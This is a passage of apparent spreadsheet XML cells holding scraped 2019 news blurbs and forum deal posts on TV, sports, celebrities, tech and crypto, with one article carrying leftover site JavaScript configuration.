    <t>What’s on TV BACHELOR IN PARADISE 8 p.m. on ABC. Summer is officially over, which means it’s time for “Bachelor in Paradise” to come to an end. In the three-hour finale the remaining four couples will go to the fantasy suites to have serious discussions about their futures. In the end, who will leave paradise in love? Who will be engaged? Who will go home heartbroken? The episode wraps up with the cast coming together to discuss the highs and lows of the season. The host, Chris Harrison, promises “an explosive reunion show” with confrontations that were left unresolved on the beach in Mexico. Also stay tuned until the end when Harrison announces the next Bachelor. BRING THE FUNNY 10 p.m. on NBC. The final contestants of the comedy show hosted by Amanda Seales (“Insecure”) will find out who won the competition. Last week, the judges, Kenan Thompson, Chrissy Teigen and Jeff Foxworthy, gave their feedback to the last five acts. But the final decision was up to America to vote on — deciding which comedy act deserves to win the $250,000 prize and the opportunity to perform at the Just for Laughs comedy festival in Montreal. HAIL, CAESAR! (2016) 10:40 p.m. on HBO. George Clooney plays a hammy mid-20th-century movie star who gets kidnapped in this Coen Brothers film, which sees those sibling filmmakers lovingly poking fun at old-time Hollywood. The ensemble cast also brings together Josh Brolin, Scarlett Johansson and Channing Tatum. “It’s a typically sly, off-center comedy,” Manohla Dargis wrote in her review for The New York Times. “Some of it is familiar and satisfyingly funny,” she added, “even if there are laughs and bits that seem as if they were written to amuse only the Coens and the Turner Classic Movies crowd.” THE LAST KIDS ON EARTH Stream on Netflix. Jack Sullivan (Nick Wolfhard) and his friends loved playing video games, eating candy and hanging out in their treehouse. But when they suddenly find themselves in a post-apocalyptic world, the crew is thrown into a real-life video game where they have to stick together to defeat monsters and zombies. The show, based off a book series by Max Brallier, features Mark Hamill, Rosario Dawson and Keith David. TALL GIRL Stream on Netflix. Like most teenage girls, Jodi (Ava Michelle) is not comfortable in her own skin. The only difference for Jodi is that at 6-foot-1, she towers over every person in her high school. But when a male Swedish exchange student, who happens to be taller than her, transfers to her school, she is overcome with shyness and insecurity. With the help of her best friend (Anjelika Washington), sister (Sabrina Carpenter) and mother (Angela Kinsey), Jodi works to overcome her fears and finds herself in a love triangle. In her review for The Times, Elisabeth Vincentelli wrote: “Instead of a John Hughes-style satire of class and social divides — not that acute here, to begin with — we get an uncritical depiction of homogeneous entitlement.” Source link</t>
  </si>
  <si>
    <t>Jewellery from cufflinks to necklaces are being made using traditional coin-pressing techniques. The post Royal Mint makes jewellery as people go cashless appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>The Duke and Duchess of Cambridge formally name a new British polar research ship Sir David Attenborough — a more dignified title than the public's choice of Boaty McBoatface.</t>
  </si>
  <si>
    <t>GREAT BRITISH BAKE OFF continued on Channel 4 this evening for Bread Week and Paul Hollywood did not hold back with his tough criticism, which left some of the contestants worried about their bakes. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>OK, so Steph Curry is coming to the rescue for Team USA. Source: Sports Business News</t>
  </si>
  <si>
    <t>Khloe Kardashian might be ALONE but that doesn’t necessarily mean she’s looking for a man…While Kourtney Kardashian on the other hand definitely is. However, …she’s not searching for a fling…she’s searching for forever. I’ve got the latest on these two KarJenner sisters right now so stay right here.</t>
  </si>
  <si>
    <t>There was Samba and celebrations for Brazilian Day at Miami Marketta over the weekend.</t>
  </si>
  <si>
    <t>SafeWork NSW has dropped criminal charges against a health district over an incident that left a baby dead and another with brain damage. Nitrous oxide was confused as oxygen at Bankstown-Lidcombe Hospital in 2016. The charges against the district have been dropped after it agreed to a $500,000 safety overhaul. In a statement to Sky News, SafeWork confirms proceedings against four other defendants remain ongoing. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Eryk Bagshaw</t>
  </si>
  <si>
    <t>Australia's ageing electricity grid risks being overwhelmed by solar panels unless the government and companies take urgent action.</t>
  </si>
  <si>
    <t>CELEBRITY MASTERCHEF continued this evening but Adam Woodyatt seemed to rub John Torode up the wrong way with his “disastrous” attempt at a mayonnaise. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>drayy posted a video: He’s too funny… and pretty smart! Recent Uploads tagged orange</t>
  </si>
  <si>
    <t>SoftBank Group , a top shareholder in the holding company of U.S. office-sharing startup WeWork, is urging it to shelve a planned IPO on concerns over the valuation that can be achieved in a listing, the Financial Times reported on Monday.</t>
  </si>
  <si>
    <t>He's light on brawn but a heavyweight in the subtler arts of league. What is it that Smith does on the field, and how has he sustained his edge?</t>
  </si>
  <si>
    <t>Match Group Inc disclosed on Friday it had received a subpoena from the U.S. Department of Justice for documents relating to certain marketing-related claims in the Federal Trade Commission's (FTC) complaint.</t>
  </si>
  <si>
    <t>Following investment from Coinbase Ventures, Offchain Labs has opened up the Alpha version of its Ethereum (ETH) scaling solution, dubbed Arbitrum. Enterprise-focused blockchain startup Offchain Labs said that their solution will enable processing speed of more than 500 transactions per second for Ethereum applications, industry-focused news outlet Crypto Briefing reported on Sept. 5. Arbitrum has reportedly secured new investment from Coinbase Ventures, the investment arm of major American cryptocurrency exchange Coinbase. Faster than Ethereum Deploying Arbitrum, developers can build smart contracts on Ethereum’s Solidity code. However, unlike regular Ethereum decentralized apps, such smart contracts are compiled by the new solution’s compiler. Both code and transactions are executed off-chain through sidechains or state channels, with Arbitrum claiming to be eventually much faster than Ethereum. In early April, Offchain Labs raised $3.7 million in a seed round led by crypto hedge fund Pantera Capital. With the investment, Offchain aimed to solve major problems associated with enterprise blockchain implementations by bringing more scalability and privacy. At the time, Offchain co-founder Ed Felten said: “We’re working to build a platform for smart contract development that provides what we think developers want, a combination of scalability so that you can scale to more transactions per second, more users, and to contracts that have more code and still have more data in them.” Yesterday, Fred Wilson, a financier and co-founder of venture capital firm Union Square Ventures, revised his bullish opinion on Ether. Wilson acknowledged that the underlying Ethereum network is experiencing problems. He wrote: “Ethereum, as many of you know, confounds me. It has shown the way to so many important things; smart contracts, programmable trust-free computing, potentially proof of stake, and a lot more. But it remains hard to build on, scaling issues abound, and many developers are looking elsewhere.”</t>
  </si>
  <si>
    <t>luketechfast</t>
  </si>
  <si>
    <t>Hi folks, RTX 2080 SUPERs (MSI Ventus) have come into stock so we are now offering those in our R5 3600 build (previous deal now expired). Regular/vanilla RTX 2080s are essentially no longer available unless previously ordered, so due to manufacturing shifts SUPER is the new normal. I have been communicating with previous customers about supply for previous 2080 deals, and the absolute majority of due orders have shipped or are shipping this afternoon/tomorrow. [NVIDIA RTX promo games codes are being provided and should be available for this new deal (waiting for announcement from NVIDIA).] Specs: Ryzen 5 3600 | RTX 2080 SUPER (MSI Ventus or equivalent but absolute majority are MSI) | 16GB 2400MHz DDR4 | Biostar B45M2 mobo | 240GB NVME SSD | 750W 80+ Bronze PSU (vast majority Thermaltake Smart) | White Leaper Pro or Black Esports Pro case I've done the PCPartPicker sniff test and reckon we're all onto a winner here - $1976 retail: https://au.pcpartpicker.com/list/NsTCpG If anyone would like clarification on existing orders please PM me and I'll get you sorted. Luke</t>
  </si>
  <si>
    <t>#tourismtour concert tickets concert concerts near me upcoming concerts date website concert tickets 2016 concert tours 2016 music tours 2016 tour dates tour 2016 upcoming concerts near me world tour 2016 2016 concerts tour dates 2016 concerts 2015 the tour tour website where to buy dates rock concerts 2016 european tour 2016 tour de france […] The post Adventure in Goa || Top 10 Things Do in goa || OMG appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>CFL.ca Staff</t>
  </si>
  <si>
    <t>Donnovan is joined by Brodie Lawson for the post-Labour Day edition of the Waggle. Dylan Wynn joins us for an interview while we look ahead to what next weekend’s rematches have to offer.</t>
  </si>
  <si>
    <t>After months of talk of the possible defection of a top official, Mr Karel Franc, Consul-General for Czechoslovakia went into hiding in Sydney.</t>
  </si>
  <si>
    <t>Average global temperature between 2015-2019 is on track to be the hottest of any five-year period on record, a UN report by the world’s leading climate agencies said.</t>
  </si>
  <si>
    <t>The PM appeals to his rival Benny Gantz after no clear winner emerges from Tuesday’s election. The post Israel election: Netanyahu urges rival Gantz to join unity government appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Android Authority The post Huawei Mate X could launch next month, expect Kirin 990 variant too appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>"The markets are really pricing in Goldilocks: they're pricing in more Fed cuts and some sort of positive resolution to trade," says Joseph Zidle, Blackstone's chief investment strategist.</t>
  </si>
  <si>
    <t>MLB roster expansion: Five intriguing promoted players, including a Yankees’ castoff and one of the Rays’ top hitters Original Source On Sunday, Major League Baseball welcomed in the roster expansion period — that time of the regular season when teams are allowed to carry more than 25 players. This is the final year where teams will be able to carry up to 40 players, as next season they’ll be capped at 28. To celebrate the last true roster expansion period, we’ve highlighted below five interesting players who were promoted to the Show on Sunday. As always, this is more art than science — if you prefer a different promoted player to the ones we’ve listed, that’s fine with us. Note that the players are presented in alphabetical order. Entering the spring, Johan Camargo appeared overqualified for a bench role. He was coming into his age-25 season with a career 111 OPS+ in nearly 800 big-league plate appearances. Yet he struggled mightily this season, resulting in a 55 OPS+ in 236 trips to the plate and a recent demotion to Triple-A. We’re including Camargo because we’re intrigued to see if he made any adjustments during his time on the farm. If so, the Braves could have another useful piece of depth on hand. If not, Camargo’s once-promising career might be on its way off the rails. Speaking of unexpected turns, Clint Frazier hasn’t appeared in the majors since mid-June despite possessing a 120 OPS+ on the year and the Yankees having countless injuries. Frazier defense might be shaky, but so is Franmil Reyes’s and Nicholas Castellanos’s — and both of those players found takers at the deadline. Frazier remained in place, suggesting the Yankees value him more than his prolonged demotion indicates. The question now is how does he fit on the roster heading forward? We’re not expecting a definitive answer in September — not with the Yankees competing for home-field advantage throughout the playoffs — yet we are expecting Frazier to mash when he’s given the opportunity. Brusdar Graterol, for those who don’t know, has one of the top arms in the Twins system. The 21-year-old has appeared in 18 games this season, mostly with Double-A Penascola, and has accumulated a 1.92 ERA and 2.65 strikeout-to-walk ratio. He has a high-quality fastball-slider combination and could provide the AL Central-leading Twins with a boost out of the bullpen. Because of his delivery, there’s a good chance he ends up as a reliever for the long haul. Nate Lowe has the highest OPS+ on the Rays among batters with more than 100 trips to the plate. Yet he’s been stuck in Triple-A due to … well, does it matter? Even Lowe doesn’t seem to care about the team’s reasoning for the demotion. “I didn’t really buy into it. I just kind of figured that I’ve got to be good wherever my feet are, and that’s the only thing we can do,” he told Marc Topkin of the Tampa Bay Times upon his return. Provided Lowe keeps hitting as he has, he’s unlikely to find himself back in the minors anytime soon — whether he remains with the Rays, who are presumably less-than-thrilled with his frankness, is to be determined. We’ll end with Sean Murphy, who likely would have debuted earlier were it not for injury. Murphy hit .308/.386/.625 in 31 games a Triple-A, yet he’s known foremost for his defense. He has a very good arm and grades well as a receiver. If Murphy can continue to tap into his raw strength and can hit the ground running, he could represent a big-time upgrade over the Josh Phegley-Chris Herrmann concoction the Athletics have been using behind the plate. Given that the A’s are essentially in a three-team race for a Wild Card Game berth, they could use each and every improvement at their disposal. require.config(“baseUrl”:”https://sportsfly.cbsistatic.com/fly-364/bundles/sportsmediajs/js-build”,”config”:”version”:”fly/components/accordion”:”1.0″,”fly/components/alert”:”1.0″,”fly/components/base”:”1.0″,”fly/components/carousel”:”1.0″,”fly/components/dropdown”:”1.0″,”fly/components/fixate”:”1.0″,”fly/components/form-validate”:”1.0″,”fly/components/image-gallery”:”1.0″,”fly/components/iframe-messenger”:”1.0″,”fly/components/load-more”:”1.0″,”fly/components/load-more-article”:”1.0″,”fly/components/load-more-scroll”:”1.0″,”fly/components/loading”:”1.0″,”fly/components/modal”:”1.0″,”fly/components/modal-iframe”:”1.0″,”fly/components/network-bar”:”1.0″,”fly/components/poll”:”1.0″,”fly/components/search-player”:”1.0″,”fly/components/social-button”:”1.0″,”fly/components/social-counts”:”1.0″,”fly/components/social-links”:”1.0″,”fly/components/tabs”:”1.0″,”fly/components/video”:”1.0″,”fly/libs/easy-xdm”:”2.4.17.1″,”fly/libs/jquery.cookie”:”1.2″,”fly/libs/jquery.throttle-debounce”:”1.1″,”fly/libs/jquery.widget”:”1.9.2″,”fly/libs/omniture.s-code”:”1.0″,”fly/utils/jquery-mobile-init”:”1.0″,”fly/libs/jquery.mobile”:”1.3.2″,”fly/libs/backbone”:”1.0.0″,”fly/libs/underscore”:”1.5.1″,”fly/libs/jquery.easing”:”1.3″,”fly/managers/ad”:”2.0″,”fly/managers/components”:”1.0″,”fly/managers/cookie”:”1.0″,”fly/managers/debug”:”1.0″,”fly/managers/geo”:”1.0″,”fly/managers/gpt”:”4.3″,”fly/managers/history”:”2.0″,”fly/managers/madison”:”1.0″,”fly/managers/social-authentication”:”1.0″,”fly/managers/tealium”:”1.0″,”fly/utils/data-prefix”:”1.0″,”fly/utils/data-selector”:”1.0″,”fly/utils/function-natives”:”1.0″,”fly/utils/guid”:”1.0″,”fly/utils/log”:”1.0″,”fly/utils/object-helper”:”1.0″,”fly/utils/string-helper”:”1.0″,”fly/utils/string-vars”:”1.0″,”fly/utils/url-helper”:”1.0″,”libs/jshashtable”:”2.1″,”libs/select2″:”3.5.1″,”libs/jsonp”:”2.4.0″,”libs/jquery/mobile”:”1.4.5″,”libs/modernizr.custom”:”2.6.2″,”libs/velocity”:”1.2.2″,”libs/dataTables”:”1.10.6″,”libs/dataTables.fixedColumns”:”3.0.4″,”libs/dataTables.fixedHeader”:”2.1.2″,”libs/dateformat”:”1.0.3″,”libs/waypoints/infinite”:”3.1.1″,”libs/waypoints/inview”:”3.1.1″,”libs/waypoints/jquery.waypoints”:”3.1.1″,”libs/waypoints/sticky”:”3.1.1″,”libs/jquery/dotdotdot”:”1.6.1″,”libs/jquery/flexslider”:”2.1″,”libs/jquery/lazyload”:”1.9.3″,”libs/jquery/maskedinput”:”1.3.1″,”libs/jquery/marquee”:”1.3.1″,”libs/jquery/numberformatter”:”1.2.3″,”libs/jquery/placeholder”:”0.2.4″,”libs/jquery/scrollbar”:”0.1.6″,”libs/jquery/tablesorter”:”2.0.5″,”libs/jquery/touchswipe”:”1.6.18″,”libs/jquery/ui/jquery.ui.core”:”1.11.4″,”libs/jquery/ui/jquery.ui.draggable”:”1.11.4″,”libs/jquery/ui/jquery.ui.mouse”:”1.11.4″,”libs/jquery/ui/jquery.ui.position”:”1.11.4″,”libs/jquery/ui/jquery.ui.slider”:”1.11.4″,”libs/jquery/ui/jquery.ui.sortable”:”1.11.4″,”libs/jquery/ui/jquery.ui.touch-punch”:”0.2.3″,”libs/jquery/ui/jquery.ui.autocomplete”:”1.11.4″,”libs/jquery/ui/jquery.ui.accordion”:”1.11.4″,”libs/jquery/ui/jquery.ui.tabs”:”1.11.4″,”libs/jquery/ui/jquery.ui.menu”:”1.11.4″,”libs/jquery/ui/jquery.ui.dialog”:”1.11.4″,”libs/jquery/ui/jquery.ui.resizable”:”1.11.4″,”libs/jquery/ui/jquery.ui.button”:”1.11.4″,”libs/jquery/ui/jquery.ui.tooltip”:”1.11.4″,”libs/jquery/ui/jquery.ui.effects”:”1.11.4″,”libs/jquery/ui/jquery.ui.datepicker”:”1.11.4″,”shim”:”liveconnection/managers/connection”:”deps”:[“liveconnection/libs/sockjs-0.3.4″],”liveconnection/libs/sockjs-0.3.4″:”exports”:”SockJS”,”libs/setValueFromArray”:”exports”:”set”,”libs/getValueFromArray”:”exports”:”get”,”fly/libs/jquery.mobile-1.3.2″:[“version!fly/utils/jquery-mobile-init”],”libs/backbone.marionette”:”deps”:[“jquery”,”version!fly/libs/underscore”,”version!fly/libs/backbone”],”exports”:”Marionette”,”fly/libs/underscore-1.5.1″:”exports”:”_”,”fly/libs/backbone-1.0.0″:”deps”:[“version!fly/libs/underscore”,”jquery”],”exports”:”Backbone”,”libs/jquery/ui/jquery.ui.tabs-1.11.4″:[“jquery”,”version!libs/jquery/ui/jquery.ui.core”,”version!fly/libs/jquery.widget”],”libs/jquery/flexslider-2.1″:[“jquery”],”libs/dataTables.fixedColumns-3.0.4″:[“jquery”,”version!libs/dataTables”],”libs/dataTables.fixedHeader-2.1.2″:[“jquery”,”version!libs/dataTables”],”https://sports.cbsimg.net/js/CBSi/app/VideoPlayer/AdobePass-min.js”:[“https://sports.cbsimg.net/js/CBSi/util/Utils-min.js”],”map”:”*”:”facebook”:”https://connect.facebook.net/en_US/sdk.js”,”facebook-debug”:”https://connect.facebook.net/en_US/all/debug.js”,”google”:”https://apis.google.com/js/plusone.js”,”google-platform”:”https://apis.google.com/js/client:platform.js”,”google-csa”:”https://www.google.com/adsense/search/async-ads.js”,”google-javascript-api”:”https://www.google.com/jsapi”,”google-client-api”:”https://apis.google.com/js/api:client.js”,”gpt”:”https://www.googletagservices.com/tag/js/gpt.js”,”recaptcha”:”https://www.google.com/recaptcha/api.js?onload=loadRecaptcha&amp;render=explicit”,”recaptcha_ajax”:”https://www.google.com/recaptcha/api/js/recaptcha_ajax.js”,”twitter”:”https://platform.twitter.com/widgets.js”,”mpx”:”libs/tpPdk”,”tealium”:”//tags.tiqcdn.com/utag/cbsi/cbssportssite/prod/utag.js”,”taboola”:”https://cdn.taboola.com/libtrc/cbsinteractive-cbssports/loader.js”,”sharethrough”:”https://native.sharethrough.com/assets/tag.js”,”newsroom”:”https://c2.taboola.com/nr/cbsinteractive-cbssports/newsroom.js”,”adobe-pass”:”https://sports.cbsimg.net/js/CBSi/app/VideoPlayer/AdobePass-min.js”,”video-utils”:”https://sports.cbsimg.net/js/CBSi/util/Utils-min.js”,”waitSeconds”:300);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MLB roster expansion: Five intriguing promoted players, including a Yankees’ castoff and one of the Rays’ top hitters appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Florence Snead</t>
  </si>
  <si>
    <t>Adele has filed for divorce from her husband Simon Konecki after the couple split up earlier this year following three years of marriage. The move was revealed in court documents lodged by the singer at a court in Los Angeles on Thursday. The couple – who began dating in 2011 – had a son, Angelo, the following year and went on to get married in a secret ceremony in 2016. A representative confirmed their separation in April, saying they were “committed to raising their son together lovingly”. Divorce settlement It is not known if the pair signed a prenuptial agreement before they wed, but previous reports have suggested Adele could end up paying her husband around half of her total fortune. According to the 2019 Sunday Times Rich List, she increased her total net worth by £10m to £150m since the previous year. Meanwhile in 2016 it was reported her tax bill for the previous year had come in at around £4m, putting her on a par with multinational companies such as Facebook. Adele performing at Wembley Stadium in 2017 (Photo: Gareth Cattermole/Getty Images for September Management) The Tottenham-born singer released her debut album, 19, in 2008, which contained the songs Chasing Pavements and Hometown Glory and reached number one in the UK. Her eagerly anticipated follow-up, 2011’s 21, brought even more success thanks to the singles Someone Like You, Rolling In The Deep and Rumour Has It. The record topped the charts in 30 countries, including the US and UK, and cemented Adele’s status as one of the world’s best-loved artists. Adele, 31, released her most recent album, 25, in 2015, which contained the single Hello. It proved to be another critical and commercial success. Birthday honour In June 2013, she was awarded an MBE in the Queen’s Birthday Honours list for services to music. Earlier this year she was invited into the Academy of Motion Pictures Arts and Sciences – the organisation behind the Oscars – as part of its work to increase its female membership. Her soon-to-be ex-husband Mr Konecki is the founder of ethical bottled water company Life Water, having previously worked at Lehman Brothers. He reportedly said in a 2012 interview with Management Today that he had been “doing well and earning a lot of money” as an investment banker but “got sick of that greedy and corrupted world”. More music Lily Allen: Warner Music failed to act after alleged sexual assault The Who tour 2020: tickets, pre-sale details, dates and venues for next year’s UK shows Westlife concert: tickets, pre-sale and album details Green Day tour 2020: tickets, pre-sale details, and full UK dates as Fall Out Boy and Weezer join Hella Mega Tour McFly announce London O2 show and album – here’s how to get tickets, and when The Lost Songs comes out The Lumineers: 'Addiction is complex — there are many shades of grey' The post Adele files for divorce from husband Simon Konecki after three years of marriage appeared first on inews.co.uk. The post Adele files for divorce from husband Simon Konecki after three years of marriage appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>When AVP rising star Eric Zaun committed suicide earlier this summer, fellow newcomer Carly Wopat was forced to relive a dark personal tragedy. Source: Sports Business News</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190910/p43#a190910p43 Interview with Bill Gates on his public image, Jeffrey Epstein, Steve Jobs, and more ahead of a docuseries, Inside Bill’s Brain, debuting on Netflix Sept. 20 (John Jurgensen/Wall Street Journal) John Jurgensen / Wall Street Journal: Interview with Bill Gates on his public image, Jeffrey Epstein, Steve Jobs, and more ahead of a docuseries, Inside Bill’s Brain, debuting on Netflix Sept. 20 — A new documentary profiles the tech-titan-turned-philanthropist. In an interview with The Wall Street Journal, Mr. Gates reflects on his shifting public image. Source: http://www.techmeme.com/190910/p43#a190910p43 The post Interview with Bill Gates on his public image, Jeffrey Epstein, Steve Jobs, and more ahead of a docuseries, Inside Bill’s Brain, debuting on Netflix Sept. 20 (John Jurgensen/Wall Street Journal) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Danish Russian Dictionary – travel dictionary to translate Danish to Russian. Click on the list to show Danish or Russian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Danish Russian Dictionary →</t>
  </si>
  <si>
    <t>Growing numbers of South Australian children, some as young as 10, are seeking mental health support for suicidal thoughts, figures show.</t>
  </si>
  <si>
    <t>Chinese students are being forced to pretend they've been kidnapped, taking photos of themselves bound and gagged, in an alarming scam sweeping the country.</t>
  </si>
  <si>
    <t>Hannah Palmer And Nathalie Fernbach</t>
  </si>
  <si>
    <t>There are fewer than 1,000 black-throated finches in the wild, but one north Queensland primary school has bred 120 as part of a science class.</t>
  </si>
  <si>
    <t>inswatch</t>
  </si>
  <si>
    <t>Receive a $200 Garmin wearable voucher from AIA by taking out both: • a new AIA Priority Protection policy for Life, TPD, Crisis Recovery or Income Protection (including AIA Vitality) and • a new myOwn health insurance policy before 30th September 2019. Conditions: • Only available to new customers who have not held a myOwn health insurance membership or an AIA Australia Priority Protection policy within the last 12 months. • Voucher code provided once both the AIA and myOwn policies have been issued and the myOwn health insurance policy has been active for at least 30 days. • If the voucher code is redeemed through the AIA Vitality website the 25% Garmin discount for AIA Vitality members will apply. • The voucher code can be redeemed directly on the Garmin AU website but it will not receive the 25% AIA Vitality discount. • The voucher can only be used once. If it is used to purchase a Garmin product with a value of less than $200 the remaining balance cannot be used in a separate transaction. • The voucher cannot be redeemed for cash or a cash alternative. • Only one voucher code will be provided per adult insured under the AIA policy. • The voucher will only be valid until its expiry date. Other benefits from combining AIA and myOwn health insurance policies are: • Vitality fee of $10 a month will be waived on the AIA policy • A 5% discount will apply to the AIA premium while myOwn policy in place Online quotes for AIA policies with Vitality are available on www.insurancewatch.com.au. Find our more information about myOwn health insurance at https://www.insurancewatch.com.au/aia-myown-health-insurance... Please note that the above is general information only and does not take into account your personal circumstances, needs or objectives. Before purchasing any insurance product you should read the Product Disclosure Statement to determine if it is suitable for your situation.</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/how-vikings-went-into-trancelike-rage-before-battle How Vikings Went Into a Trancelike Rage Before Battle Ethnobotanists have a new theory on which plant the berserkers ingested. Source: https://www.wired.com/story/how-vikings-went-into-trancelike-rage-before-battle The post How Vikings Went Into a Trancelike Rage Before Battle appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Best Noise-Cancelling Headphones Buying Guide: Welcome to TechRadar's round-up of the best noise-cancelling headphones you can buy in 2019. Here are so many applications for noise cancelling headphones that after a point you have to wonder why nobody thought of making them sooner. Sometimes it's the incessant chatter of your co-worker, sometimes it's the construction in the plot next door, and sometimes it's just people, in general. Enter noise-cancelling headphones, which remove the sound of everything around you, so you can listen to your music at a lower (and safer) volume. There are large variations in how wel… TechRadar – All the latest technology news The post The best noise-cancelling headphones available in India for September 2019 appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Welcome to LocalAdz, your total online marketing results firm. We focus on High quality WordPress Website Design, Mobile Web Design and are Internet Search Engine Management experts. Whatever you want to be well known for on the Web, we can make you a VISIBLE influencer in your geographic region. Shop in Bowersville OH. We use cutting edge methods for your keywords that are PROVEN and EFFECTIVE at increasing YOUR position in the search engines! We are a complete custom Premium Website Design, SEM Bowersville and Internet Marketing firm. We can meet all of your Custom Web Design and Search Engine Management needs. We are experienced Web designers and search engine managers using the latest technology and online marketing techniques. We use the latest Web standards to meet your goals and expectations. We create websites and mobile websites that function across all browsers and mobile devices and load in the blink of an eye. Affordable Custom Website Design in Bowersville OH | Mobile Website Design We utilize W3C compliant, search engine friendly code in all of our projects. We bring a user-centric philosophy and process to each and every decision, with our experience in usability and design. In short we do more than just design websites that are “pretty”. We design websites that help convert visitors into clients! We want to make Internet Marketing an accessible and successful addition to any marketing plan. We are a leading Internet Marketing and Search Engine Management Bowersville OH Specialists. We can help drive more unique visitors to your website and convert them to buyers. We have been designing Websites and providing SEM since 2009; there have been MANY changes over these last few years. As technology has improved so has the web. It is more important than ever to keep up with the industry standards and what Google expects to see in web design. Because the best website on the planet will do you no good if people cannot find it. Good SEM and quality Web Design go hand in hand if you truly want to dominate your competition. Let LocalAdz help. We are not only one of the best SEM Companies in Bowersville, we also offer top notch web design and development. Whether you need just a simple informational HTML website, or a custom built database, or anything in between we got it covered. Shop for Custom Web Development in Bowersville OH. More Bowersville OH Information Bowersville Ohio Weather Nearby Locations Hire WordPress Developers in South English IA WordPress Development Services For Sites in Simpson LA WordPress Developer in Roann IN Custom Web Development in Trumbull NE WordPress Developer in Jacumba CA Hire WordPress Developers in Cleveland NM WordPress Development Company in Elkridge MD WordPress Theme Development Services in Waynesville MO WordPress Development Services For Sites in Thompsonville IL Official Web Development Company in Jarreau LA Bowersville Ohio Map Republished by Blog Post Promoter The post Custom Web Development in Bowersville OHOriginally Posted on November 2, 2015 and reposted on September 10, 2019 appeared first on WordPress Development Services.</t>
  </si>
  <si>
    <t>EDMONTON — Lirim Hajrullahu’s 34-yard game-winning field goal in the final seconds against the Edmonton Eskimos clinched a playoff spot for the now 10-3 Hamilton Tiger-Cats. An awkward snap caused the kick to hit the uprights and nearly miss, as Dane Evans got the ball in place just in time for Hajrullahu to make the kick. “Heck of a hold,” Head coach Orlondo Steinauer said after the win. “We didn’t execute how we would in practice or how we would like to in a situation like that. It’s always going to be judged on results, and so it found a way to go through. A little uneasy there no doubt, but we came through this time.” RELATED: » Ticats edge Esks with last-second field goal » Images: Tiger-Cats at Eskimos » By the Numbers: View Boxscore » Watch: Three throws equals three touchdowns for Evans » Watch: Hajrullahu banks in game-winning field goal But Hajrullahu said he wasn’t worried for a second. “No matter what the snap or the hold, I trust in Dane to get the ball. I said ‘as long as you put it up on the grass there, we’ll be able to put it through.'” Hajrullahu said pivotal moments with the game on the line are what he lives for as a football player. The 29-year-old kicker had a chance to win the game for Hamilton in their Week 14 battle against the Calgary Stampeders, but his kick was blocked by Tre Roberson. Hajrullahu was happy to get another chance with a game-deciding moment. “As a kicker, you got to love that,” Hajrullahu said. “I love those type of moments. We’ve had multiple moments in Grey Cups and everything else, and I just love that it comes down because it really proves to your preparation and how hard you’ve been working. And my whole thing, I just wanted to see the guys happy, and seeing the smiles on their faces after the game just makes this whole thing worth it.” The Ticats started strong on offence by scoring 24 unanswered points against the Esks, but they stalled during the second half while Edmonton came back to tie the game. The Ticats got things going again on offence just in time to grab the win in the final 30 seconds, with Dane Evans completing a 26-yard pass to Bralon Addison to get the drive started before three consecutive run plays set up the field goal. “We just kind of went to our bread-and-butter plays,” Evans said. “We just kind of did what got us here. We didn’t perform our best definitely in the third and fourth quarter, but when it was time to put up or shut up we showed up and we went back to the basics.” Hamilton overwhelmed the Esks in the first quarter with quick scoring drives and deep touchdown passes. Evans completed seven straight passes for 197 yards and three touchdowns to start the game, including a 76-yard bomb to Addison that put the Ticats up 21-0. “We got some guys that can roll,” Evans said. “We got some guys that can run, and not just Speedy. And I think we showed that a little bit tonight.” The Hamilton Tiger-Cats’ next test comes when they take on the Winnipeg Blue Bombers in a road matchup next Friday in Week 16.</t>
  </si>
  <si>
    <t>hamza23</t>
  </si>
  <si>
    <t>Amazon Deal of the day. Noticed it was $115 cheaper than their last deal on eBay a few months back. Seems like a good price coming from a local seller and still a bit cheaper than grey import sites (TobyDeals $554, TecoBuy $565, Catch $572, Kogan $716 etc.) from a quick search. It's currently $599.20 on their eBay store after the 20% off code. Features: Display: 6.39 inch, 1080 x 2340 FHD+ Pixel Screen CPU: Qualcomm Snapdragon 845 Octa-core 2.8GHz MIUI10 ( Android 9 ), Bluetooth:5.0, GPS, A-GPS, Glonass, Beidou Camera: 24.0MP + 2.0MP rear camera + dual 12.0MP front camera More info</t>
  </si>
  <si>
    <t>Angel Parsons</t>
  </si>
  <si>
    <t>Underwater statues and submerged hotels are some of the latest attractions on the Great Barrier Reef, and that is concerning some old-school tourism operators.</t>
  </si>
  <si>
    <t>Ross McIndoe</t>
  </si>
  <si>
    <t>Spiders’ two most recent games, Bound by Flame and The Technomancer, both received highly mixed reviews, with critics clearly swept up by their beautiful world-design but unable to get past the fundamental design flaws.Their latest effort, GreedFall, is set in the 18th century and sees players set sail for the mysterious island of Teer Fradee. The island becomes the site of a power scramble between various invading colonial powers, as well as the native Elves struggling to hold on to their land. Players can side with whomever they choose in their quest to take control of the island, using means both diplomatic and otherwise to deal with the various mobs and monsters they encounter. With the game having only just dropped, reviews are trickling in slowly, but the early signs are highly promising. The initial rounds have GreedFall sitting at a respectable 77 on Metacritic, with early players giving it an average rating of 7.9. While it is still early, no critic has given GreedFall a negative review so far. Here’s what they’ve said: ‘This is going to be a crowd-pleaser for those of us who still shake our canes and talk about how the genre peaked a decade ago. We may have to eat our words before long.’ – IGN “The island of Teer Fradee is full of beautiful, diverse, but still-grounded environments” says T.J. Hafer in his review for IGN, in which he praises the game’s complex morality system which “forced me to make a lot of interesting decisions based on my own value judgements.” Acknowledging that “Combat was by far the weakest pillar of Spiders’ past games”, he affirms that this issue has been set upon effectively by the French devs, culminating in “a fun, flowing, challenging tactical combat system that I still haven’t gotten enough of”. While he notes that there are still “glitches, awkward character models, 